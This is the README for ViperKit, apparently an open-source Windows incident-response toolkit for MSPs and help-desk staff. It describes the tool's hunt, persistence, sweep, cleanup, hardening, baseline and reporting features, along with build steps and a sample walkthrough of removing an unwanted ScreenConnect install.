Portable Incident Response Toolkit for Windows
USE AT YOUR OWN RISK. ViperKit is an open-source project provided AS-IS with NO WARRANTY or guarantee of issue resolution. The author is NOT responsible for any damages, data loss, or system issues resulting from the use of this tool. Always test in a safe environment and maintain backups before performing any remediation actions.
- Overview
- Key Features
- System Requirements
- Installation
- Quick Start
- Workflow
- Features by Tab
- Screenshots
- Building from Source
- File Locations
- Contributing
- License
ViperKit is a portable, offline-first incident response toolkit for Windows, designed for MSPs and IT teams without dedicated security staff.
- Tier 1/2 Help Desk Technicians
- MSP Engineers
- IT Staff with limited cybersecurity experience
- Security professionals needing portable IR tools
ViperKit provides a guided incident workflow that walks you from initial detection to complete remediation:
"I think this box is compromised"
↓ HUNT → Find the suspicious tool/file
↓ PERSIST → Discover persistence + analyze PowerShell history
↓ SWEEP → Find related artifacts (time clustering)
↓ CLEANUP → Safely remove threats (with undo)
↓ HARDEN → Apply security controls
↓ BASELINE → Capture clean state
↓ CASE → Export complete documentation
- ❌ Not an antivirus or EDR replacement
- ❌ Not automated malware removal
- ❌ Not cloud-dependent (works fully offline)
- ❌ Not a magic "fix everything" button
- Case management (start new / load existing)
- System snapshot (hostname, user, OS version)
- Baseline capture and comparison for monitoring
- Demo Mode - Guided walkthrough for training
- Admin privilege detection with warning banner
- Scrollable interface for multiple cases
- 6 IOC Types: Auto-detect, File/Path, Hash, Domain/URL, IP, Registry, Name/Keyword
- File metadata extraction and multi-hash calculation (MD5/SHA1/SHA256)
- DNS lookups, HTTP probes, reverse DNS, ping tests
- Process enumeration and scoped file searches
- Set case focus to track targets across all tabs
- Hunt history dropdown remembers last 10 searches
- Comprehensive coverage: Registry Run keys, Services, Scheduled Tasks, Startup folders
- High-signal detection: IFEO debuggers, Winlogon hijacks, AppInit_DLLs
- Risk assessment with color-coded badges (CHECK/NOTE/OK)
- MITRE ATT&CK technique mapping
- Publisher extraction from executables
- Focus highlighting with colored borders
- PowerShell History Analysis:
- Scans PS 5.1 and PS 7 history from all users
- Risk scoring (HIGH/MEDIUM/LOW) with pattern matching
- Base64 decoding for encoded commands
- Detects downloads, execution bypasses, LOLBins, credential access
- Filtering by severity, user, version, recency
- Configurable lookback windows (24h, 3d, 7d, 30d)
- Time clustering: Find files created ±1-8h around suspicious activity
- Folder clustering: Detect related files in same directory
- Severity-based classification (HIGH/MEDIUM/LOW)
- VirusTotal integration for hash lookups
- Focus integration with multi-color highlighting
- Quarantine files with full undo capability
- Disable services and scheduled tasks (reversible)
- Registry backup before deletion
- Journal-based tracking for audit trail
- Confirmation dialogs for destructive actions
- Preview before execute workflow
- Execute all / execute selected
- Stats display (total, pending, completed, failed)
- Security Profiles:
- Standard - Balanced security for most environments
- Strict - Maximum security (may impact compatibility)
- Custom - Manually select individual actions
- 15 Hardening Actions across 5 categories:
- Script Execution (disable WSH, PS v2, enable logging)
- Firewall (enable all profiles, block RMM ports)
- Defender (realtime, cloud, PUA, controlled folders)
- AutoRun/AutoPlay disable
- Remote Access (RDP NLA, disable RDP)
- Apply and rollback capability
- Journal tracking for all changes
- Current state detection before applying
- Chronological event timeline from all activities
- Focus targets tracking
- Professional PDF reports powered by QuestPDF:
- Executive summary with risk breakdown
- Critical next steps (password resets, monitoring, patching, etc.)
- Scans performed with totals
- Top high-risk findings
- Remediation actions taken
- Hardening applied
- Baseline information
- Timeline of key events
- Export to: PDF, Text, JSON logs
- Auto-save case data
- Searchable help content with real-time filtering
- Safety rules (prominently displayed)
- Quick start guide
- Tab-by-tab usage instructions
- Tips & best practices
- FAQ section
- File locations reference
- Keyboard shortcuts
- OS: Windows 10 (1809+) or Windows 11 / Windows Server 2019+
- Runtime: .NET 9.0 Runtime (or use self-contained exe)
- Privileges: Administrator rights required
- RAM: 512 MB minimum, 1 GB recommended
- Disk: 100 MB for application + space for quarantine
- OS: Windows 11 or Windows Server 2022
- RAM: 2 GB+
- Disk: 1 GB+ for quarantine and logs
- Registry keys (HKLM, IFEO, Winlogon)
- Services and drivers
- All user profiles (including PowerShell history)
- Scheduled tasks
- System directories
To run as admin: Right-click ViperKit.exe → Run as Administrator
- Download the latest release from Releases
- Extract to a folder (e.g.,
C:\Tools\ViperKit) - Right-click
ViperKit.exe→ Run as Administrator
# Clone the repository
git clone https://github.com/jtarkington77/ViperKit.git
cd ViperKit/ViperKit.UI
# Build
dotnet build
# Run
dotnet run
# Or publish self-contained exe
dotnet publish -c Release -r win-x64 --self-contained true -p:PublishSingleFile=true- Launch ViperKit as Administrator
- Dashboard → Start New Case (or load existing)
- Enter optional case name (e.g., "Ticket-12345")
- Go to Hunt tab
- Enter IOC: file path, domain, hash, etc.
- Click Run Hunt
- If found, click Set as Case Focus
- Go to Persist tab
- Click Run Persistence Scan
- Scroll down to PowerShell History section
- Click Scan PowerShell History
- Review highlighted items matching your focus
- Add suspicious entries to cleanup queue
- Go to Sweep tab
- Select lookback window (e.g., 7 days)
- Click Run Sweep
- Review time-clustered files (orange borders)
- Add related items to focus and cleanup
- Go to Cleanup tab
- Review queued items
- Click Execute All (confirmation dialog appears)
- Items are quarantined with full undo capability
- Go to Harden tab
- Click Scan Current State
- Select Standard or Strict profile
- Review selected actions
- Click Apply Selected
- Go to Dashboard
- Click Capture Baseline
- Return weekly to Compare to Baseline
- Go to Case tab
- Click Export Report
- PDF saved to
Documents\ViperKit\Reports\
Case Focus is a global list of suspicious targets that follows you across all tabs. When you find something suspicious, add it to focus and it highlights everywhere.
Examples:
- ConnectWiseControl.Client.exe
- malware.exe
- powershell.exe
- suspicious-script.ps1
Scenario: Attacker installed ScreenConnect that keeps reappearing after uninstall.
1. HUNT → Search "ScreenConnect"
→ Find: ScreenConnect.ClientService.exe
→ Set as case focus
2. PERSIST → Run persistence scan
→ See: ScreenConnect service (highlighted)
→ See: Scheduled task for ScreenConnect
→ Run PowerShell history scan
→ See: Encoded download command (HIGH risk)
→ Add to cleanup queue
3. SWEEP → Run 7-day scan with ±2h cluster window
→ See: ScreenConnect.Setup.msi (TIME CLUSTER)
→ See: helper.ps1 in AppData (TIME CLUSTER)
→ Add to focus
4. PERSIST → Re-run scan with expanded focus
→ See: Additional persistence for new items
5. CLEANUP → Review queue (service + task + files)
→ Execute cleanup
→ All items quarantined/disabled
6. HARDEN → Apply Standard profile
→ Enable script block logging
→ Enable Defender PUA protection
→ Disable AutoRun
7. BASELINE → Capture clean baseline
8. CASE → Export PDF report
→ Complete documentation for ticket
- System snapshot (hostname, user, OS version)
- Case management (start new / load existing)
- Admin privilege detection with warning banner
- Baseline capture and comparison
- Demo Mode with guided walkthrough
- Case summary with event counts
- Scrollable content for multiple cases
- IOC Types: Auto-detect, File/Path, Hash, Domain/URL, IP, Registry, Name/Keyword
- Structured results with severity levels
- Hash calculation (MD5, SHA1, SHA256)
- Network probes (DNS, HTTP, ping)
- Process and file system searches
- Hunt history dropdown (last 10 searches)
- Add to case focus
- Registry: Run/RunOnce (HKCU/HKLM + Wow6432Node)
- Winlogon: Shell/Userinit hijacks
- IFEO: Debugger hijacks
- AppInit_DLLs: DLL injection points
- Services & Drivers: Auto-start only
- Scheduled Tasks: All enabled tasks
- Startup Folders: All users + current user
- PowerShell History Analysis:
- Scans Windows PowerShell 5.1 and PowerShell 7
- High/Medium/Low risk scoring
- Pattern matching for attacks (downloads, encoded commands, LOLBins)
- Base64 decoding
- Filtering by severity, user, version, recency
- Export suspicious commands
- Risk assessment with color badges
- MITRE ATT&CK mapping
- Publisher extraction
- Focus highlighting
- Lookback windows: 24h, 3d, 7d, 30d
- Scan locations: User profiles, ProgramData, Startup, Services
- File types: Executables, DLLs, scripts, installers, archives
- Severity levels: HIGH / MEDIUM / LOW
- Time clustering: ±1h, ±2h, ±4h, ±8h configurable
- Focus highlighting:
- Pink border: Focus term match
- Orange border: Time cluster
- Blue border: Folder cluster
- VirusTotal integration
- Add to cleanup queue
- Queue items from Persist and Sweep
- Actions:
- Quarantine files (with undo)
- Disable services (reversible)
- Disable scheduled tasks (reversible)
- Backup and delete registry keys (restorable)
- Confirmation dialogs for destructive actions
- Execute all / execute selected
- Undo last / undo selected
- Journal tracking for audit trail
- Stats display (total, pending, completed, failed)
- Open quarantine folder
- Scan current security configuration
- 15 hardening actions across categories:
- Script Execution: Disable WSH, disable PS v2, enable script block logging, enable module logging, set RemoteSigned policy
- Firewall: Enable all profiles, block common RMM ports
- Defender: Enable realtime protection, cloud protection, PUA protection, controlled folder access
- AutoRun: Disable AutoRun, disable AutoPlay
- Remote Access: Require NLA for RDP, disable RDP
- Security Profiles:
- Standard - Recommended for most environments
- Strict - Maximum security (includes all Standard + strict options)
- Custom - Manually select individual actions
- Apply selected / select all / deselect all
- Rollback capability:
- Rollback last action
- Rollback all actions for this case
- Journal tracking
- Current state detection (shows what's already configured)
- Chronological event timeline
- Focus targets display
- Export formats:
- Professional PDF report
- Text file export
- JSON event logs
- PDF report includes:
- Executive summary
- Critical next steps (password resets, monitoring, patching, documentation, network security, authentication review)
- Scans performed with totals
- Top high-risk findings (filtered by severity)
- Remediation actions taken
- Hardening applied
- Baseline information
- Timeline of key events
- Auto-save case data
- Searchable documentation with real-time filtering
- Safety rules (highlighted warning section)
- Quick start guide
- Tab-by-tab instructions (all 8 tabs documented)
- Tips & best practices
- FAQ section (including admin requirement)
- File locations reference
- Version info with GitHub link
Main dashboard showing case management, system snapshot, baseline capture, and Demo Mode
IOC search with structured results, hunt history dropdown, and focus highlighting
PowerShell history analysis with risk scoring, base64 decoding, and suspicious command detection
Persistence mechanisms with risk assessment and focus highlighting
Temporal clustering showing related files installed around the same time
Remediation queue with confirmation dialogs and undo capability
Security hardening with Standard/Strict profiles and rollback capability
Professional PDF report with executive summary, critical next steps, and findings
- .NET 9.0 SDK
- Git
- Windows 10/11 or Windows Server 2019+
# Clone repository
git clone https://github.com/jtarkington77/ViperKit.git
cd ViperKit/ViperKit.UI
# Restore dependencies
dotnet restore
# Build
dotnet build -c Release
# Run
dotnet run
# Create portable exe
dotnet publish -c Release -r win-x64 --self-contained true -p:PublishSingleFile=true -p:PublishTrimmed=falseOutput: ViperKit.UI\bin\Release\net9.0\win-x64\publish\ViperKit.UI.exe
- Case files:
C:\ProgramData\ViperKit\Cases\{CaseId}\case.json - Case events: Stored in case.json
- Cleanup journal:
C:\ProgramData\ViperKit\CleanupJournals\{CaseId}_cleanup.json - Harden journal:
C:\ProgramData\ViperKit\HardenJournals\{CaseId}_harden.json
- PDF reports:
C:\Users\{User}\Documents\ViperKit\Reports\ - Text exports:
C:\ProgramData\ViperKit\Cases\{CaseId}\case_export.txt - Baselines: Stored in case.json within Cases folder
- Search history:
%APPDATA%\ViperKit\hunt_history.txt
- .NET 9.0 - Modern .NET runtime
- Avalonia UI 11.3 - Cross-platform UI framework
- QuestPDF 2024.10.3 - Professional PDF generation
- C# - Primary language
- Windows APIs - Registry, Services, WMI, Task Scheduler
This is an open-source project. Contributions are welcome!
- Report bugs and feature requests on GitHub Issues
- Use at your own risk - no warranty or guarantee of issue resolution
- Follow existing code style
- Test thoroughly before submitting PRs
- Update documentation for new features
Proprietary License - VENOMOUSVIPER / Jeremy Tarkington
This is an open-source project provided AS-IS for educational and professional use. See disclaimer at top.
- GitHub: ViperKit
- Issues: Report bugs and request features
- Disclaimer: Use at your own risk - no warranty or guarantee of support
Built for MSPs, IT teams, and security professionals who need portable incident response tools.
VENOMOUSVIPER - Professional cybersecurity tooling